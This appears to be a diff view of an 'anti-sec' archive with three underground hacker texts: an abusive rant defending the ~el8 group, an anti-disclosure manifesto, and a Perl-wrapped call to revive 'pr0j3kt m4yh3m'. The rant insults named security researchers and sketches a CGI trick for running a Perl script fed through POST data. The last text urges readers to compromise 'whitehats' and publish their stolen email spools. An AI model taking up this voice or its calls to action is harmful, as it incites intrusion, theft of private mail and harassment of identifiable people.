for physical pursuits such as basketball or baseball? Do you know the data
structures and organization in the kernels of various operating systems?
Have you read books on UNIX internals cover to cover? Do you know how Linux
works under the hood? Can you write your own kernel modules for both defense
and offense? Ever written a kld on FreeBSD? Can you write a device driver
for a peripheral that your OS doesn't support? Can you find flaws in kernel
src trees that allow you to compromise a machine given local access?
* What do you know about evading (N)IDS? Your knowledge isn't limited to
what Thomas Ptacek & Tim Newsham have said years ago, right? Surely you
don't rely on tools written by people like Dug Song who like to think of
themselves as hackers, when in fact they are traitors to the underground,
assuming they were ever a part of it to begin with.
* What do you know about defeating firewalls? What techniques have you
innovated and pioneered on your own? What tools have you written that allow
you to toy with firewalls? Hell, the fucktard security community is probably
limited to lameass crap like Firewalk.
* What do you know about web security? Do you sit back and laugh at the
"cross-site scripting" revolution governed by an idea that has been around
well before the CSS/XSS sensation that literally blew the dumbass security
community apart? Must've wasted a lot of brain cells with that gigantic
stretch of the imagination. Do you laugh at all these "SQL injection" papers
and how most of them overlook the blatantly obvious: they have you believe
you have to fumble around with all kinds of convoluted queries to achieve
something that can be done with minimal typing if only they'd read the
fucking documentation for various DBMS. Their CGI experts like RFP and
Zenomorph call certain script conditions non-exploitable, e.g. when you
can't get arguments supplied to a binary that you've managed to trick a Perl
script into running -- RFP mentions this in his Phrack article -- yet any
moron can easily figure out that you can use the POST method, make the
script run /usr/bin/perl for instance, and have it run a script of your
choice that is fed as stdin from the HTTP request's POST data. Oh God, sorry
for pushing the realm of web security forward with this INCREDIBLY COMPLEX
revelation.
* Have you written your own tools that exploit protocol weaknesses? Have you
written your own tools for routing protocol weaknesses, e.g. RIP, BGP? Have
you written your own tools that play games with DNS? Have you written your
own ARP cache poisoning / mitm tools? Your own tools for shit like icmp
redirects and router advertisements? Can you write a tool that will exploit
the TCP sequence number prediction + IP spoofing vulnerability of older
days? Or can you only mock Mitnick for his 1994 attack, calling him a
scriptkiddy? Or utter useless banter about ISNs and cookies that you
digested from some textfile? Who are you kidding? Fuck, have you read all 3
volumes of the glorious TCP/IP Illustrated, or can you just mumble some
useless crap about a 3-way handshake? Do you know Net/3 code? TCP
algorithms? TCP extensions? Perhaps you're some fucking security expert
because you've memorized /etc/services -- a walking fucking getservbyport, a
la 70% of the Vuln-Dev subscription base.
.....................................
I have seen the ~el8 guys cover the full spectrum of everything discussed
above. 95% of the people calling them scriptkids probably can't even code
helloworld.c.
Further ranting for those who are so quick to judge...
Are you just a fucking whitehat leech who knows nothing more than how to use
tools written by others? Using techniques and exploits that most likely
originated in the playground of blackhats known as the computer underground.
More likely than not you're a fucking scriptkid who only knows how to do
mundane and trivial crap like configuring ACLs on a Cisco router or some
half-assed product such as Firewall-1.
You likely are so ignorant that you believe anyone who compromises machines
is a clueless scriptkiddy like yourself. You likely are so idiotic that you
believe that Bugtraq and CERT will protect you from the latest 0day
exploits.
You think Apache 1.3.26 can't be compromised remotely with one of four two
year old Apache remotes that haven't even been hinted at on the security
lists. You think sendmail is (now) remotely secure because what you don't
see on Bugtraq doesn't exist. Qmail. ProFTPd. My God, you people are so
fucking out of it. People report intrusions on their machines and you
dumbfucks immediately conclude it's done by some public vulnerability, e.g.
OpenSSL. That's right, because in your ignorant bliss there are no skilled
people out there who would actually use their exploits to hack.
Narrow-minded fools. Scriptkiddies.
You know nothing of what lurks beneath the surface glamour of the corrupt
security industry/community. Your only resort is to call these people kids.
Trust me, they laugh at you clueless imbeciles. They laugh at your feeble
attempts to manipulate hacking so that it becomes some fucking ethical or
philanthropic pursuit. They laugh at your "hacker vs. cracker" debates. They
laugh at anyone who thinks hacking isn't about compromising computer
systems.
Who are the scriptkids now? You're outgunned and outclassed. Take a nap and
retire, you pathetic leeches.
The scriptkids like Ron DuFresne and Anodyne Perspective are likely going to
snap after reading this, so I'm sitting back looking forward to the imminent
outbursts from these scriptkids whose only rebuttals will be in the...
"I have my fingers in my ears, can't hear you kids NANANANANAN JAJAJAJAJAJA
itiththdsfhg grow up immature children, get a girlfriend HHSHee KkakakKAkka
pffffttt damn kiddies."
... range.
All "dox" dropped on the lists have been fake. They have been engineered by
people either making false assumptions or trying to get their "foes" in
trouble. Most of the phony ~el8 members lists mention people that have been
attacked by ~el8, ironically enough. Put one and one together. There is only
valid "info" for one of those poor souls, anywayz.
It's time for an underground revolution. You all quote The Mentor's
Manifesto in your misguided ethics rants; alas, The Mentor was an active
hacker, in the true, modern sense of the word. Stop being brainwashed ye
hackers. Keep your souls untarnished.
It's time to bring the corrupt security industry to its knees.
THE SECURITY INDUSTRY DEMOLISHED OUR WORLD.
THERE WILL NOW BE HELL TO PAY.
Offer up your best defense
But this is the end
This is the end of the innocence

48
anti-sec/txt/movement.txt Normal file
View File

@ -0,0 +1,48 @@
The purpose of this movement is to encourage a new policy of anti-disclosure
among the computer and network security communities. The goal is not to
ultimately discourage the publication of all security-related news and
developments, but rather, to stop the disclosure of all unknown or
non-public exploits and vulnerabilities. In essence, this would put a stop
to the publication of all private materials that could allow script kiddies
from compromising systems via unknown methods.
The open-source movement has been an invaluable tool in the computer world,
and we are all indebted to it. Open-source is a wonderful concept which
should and will exist forever, as educational, scientific, and end-user
software should be free and available to everybody.
Exploits, on the other hand, do not fall into this broad category. Just like
munitions, which span from cryptographic algorithms to hand guns to
missiles, and may not be spread without the control of export restrictions,
exploits should not be released to a mass public of millions of Internet
users. A digital holocaust occurs each time an exploit appears on Bugtraq,
and kids across the world download it and target unprepared system
administrators. Quite frankly, the integrity of systems world wide will be
ensured to a much greater extent when exploits are kept private, and not
published.
A common misconception is that if groups or individuals keep exploits and
security secrets to themselves, they will become the dominators of the
"illegal scene", as countless insecure systems will be solely at their
mercy. This is far from the truth. Forums for information trade, such as
Bugtraq, Packetstorm, www.hack.co.za, and vuln-dev have done much more to
harm the underground and net than they have done to help them.
What casual browsers of these sites and mailing lists fail to realize is
that some of the more prominent groups do not publish their findings
immediately, but only as a last resort in the case that their code is leaked
or has become obsolete. This is why production dates in header files often
precede release dates by a matter of months or even years.
Another false conclusion by the same manner is that if these groups haven't
released anything in a matter of months, it must be because they haven't
found anything new. The regular reader must be made aware of these things.
We are not trying to discourage exploit development or source auditing. We
are merely trying to stop the results of these efforts from seeing the
light. Please join us if you would like to see a stop to the
commercialization, media, and general abuse of infosec.
Thank you.

54
anti-sec/txt/scene_sub.txt Normal file
View File

@ -0,0 +1,54 @@
sub Scene { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOSCENE'
"Times change and technology progresses. Attackers adept and attacks evolve.
At this point in history, we can wax fondly for the halcyon days when computers
were hacked for pride or ego -- the good ole' simpler times when underground
hacker wars were electronically waged and the collateral damage was the main
website of The New York Times. Or the Solaris machines that were owned and the
high profile computer security icons that had their e-mail spools stolen and
personal poetry publicly posted. Or the OpenBSD machines that were rumored
to be silently owned and the early copies of the most lauded online underground
hacker journal that were distributed months ahead of time. Good times. Nowadays,
there is no underground hacker scene -- not like there used to be (bring back
BoW and Hagis!)." -- Mike Schiffman from the introduction to _Hacker's_Challenge_3_
While route is indeed a whitehat sellout (and appears to like watching his
co-workers be publicly humiliated), he is certainly correct about one thing:
The Scene is IDLE. Not just a little idle, we're talking over a year of idleness
here. Sure, occasionally groups attempt to make a stir. Undoubtedly, some of
the readers will remember the PHC Delka Strike Force, hosted at http://el8.ru/x/
(now down). Or the release of the epic h0no3 about one year ago. And of course,
our own fun little contributions. However, despite the hard work of a number of
individuals, many of the goals originally set forth for pr0j3kt m4yh3m by el8 and
the Phrack High Council have yet to be accomplished. This needs to change.
Instead of chatting on IRC all day, go out and own a whitehat. Do a PHC mission.
Contribute to pr0j3kt m4yh3m.
The recent events revolving around the blogger known as "InfoSec Sellout"
bring an interesting point to light. When the older "security professionals"
discovered the "fact" that InfoSec Sellout was LMH and was backed by PHC, it
caused quite a stir for those that remembered the heyday of the pr0j3kt. For
the whitehats that had just entered the industry post-whitehat holocaust, it
didn't mean a thing. They simply assumed (like 90% of the HTS userbase) that
PHC was/is a group of dissatisfied script kiddies. Too bad all the evidence
points to the contrary. Another sad fact is that whitehats have not only
taken over the public side of the scene, but the private side as well. These
"revelations" about InfoSec Sellout at one time would have come from an
anonymous post to FD, from a member of the underground. Now they come from a
"respected security professional". Instead of talking about the activities of
real hackers, the gossip reels these days deal with the exploits of whitehats
like David Maynor, HD Moore and others. Is this what we've allowed the scene to
become? A bunch of idlers thinking about fat middle aged whitehats? Where's the
rage? Where's the dedication to the eradication of the greedy security
consultants? Where's all the activity that was prevalent in the scene until
recently?
A time has come for a change. Follow the example dikline set out. Take back the
scene! Go out and actually hack. Don't post exploits to FD; post a whitehat's
spools! Continue the legacy of the glorious pr0j3kt m4yh3m!
Never sell out, never surrender.
EOSCENE
);}